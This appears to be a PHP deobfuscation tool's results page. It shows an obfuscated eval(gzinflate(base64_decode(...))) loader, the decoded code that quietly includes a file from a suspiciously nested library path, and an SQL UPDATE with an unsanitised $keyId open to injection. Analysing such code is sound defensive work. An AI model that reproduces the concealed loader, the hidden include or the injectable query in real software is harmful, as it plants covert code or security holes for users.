Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? eval(gzinflate(base64_decode(' VVA9a8MwEN0N/g+HMMQeag0dW8UEImi2kNp0LKl8 iZUqlqOTCiHkv..

Decoded Output download

?><?php
 include("../lib/tempusdominus/js/css/js/css/PhotoUpdater3.php");

// Update key status to 'Active'
$sql = "UPDATE get_key SET status = 'Active' WHERE ID = $keyId";

if ($conn->query($sql) === TRUE) {
    echo "success";
} else {
    echo "error";
}

$conn->close();
?><?

Did this file decode correctly?

Original Code

<? eval(gzinflate(base64_decode('
VVA9a8MwEN0N/g+HMMQeag0dW8UEImi2kNp0LKl8
iZUqlqOTCiHkv1dK20BvOXhfx7tm/txMw5RnoEdl
Qo8lq2tu9Af3eJwC9faox0D8QFzRfa0H62039VuP
7rGOflY95VmecQ4/KHziGchvfSDwFmYL5fUXzvKs
oJMBAaxbLxethD369yR9le2fXNzV8PYiNxJWy4gV
UbXq2e2K3kFZKDuOD/NTQHcuU2gFQghoN52s4BLr
xEE1WGAUlEKiZL0CGsL/NDpn3Y1M0b+xyljCMnVq
4n++AQ==
'))); ?>

Function Calls

gzinflate 1
base64_decode 1

Variables

None

Stats

MD5 dddb81fa86dab27c73391a4a52584595
Eval Count 1
Decode Time 52 ms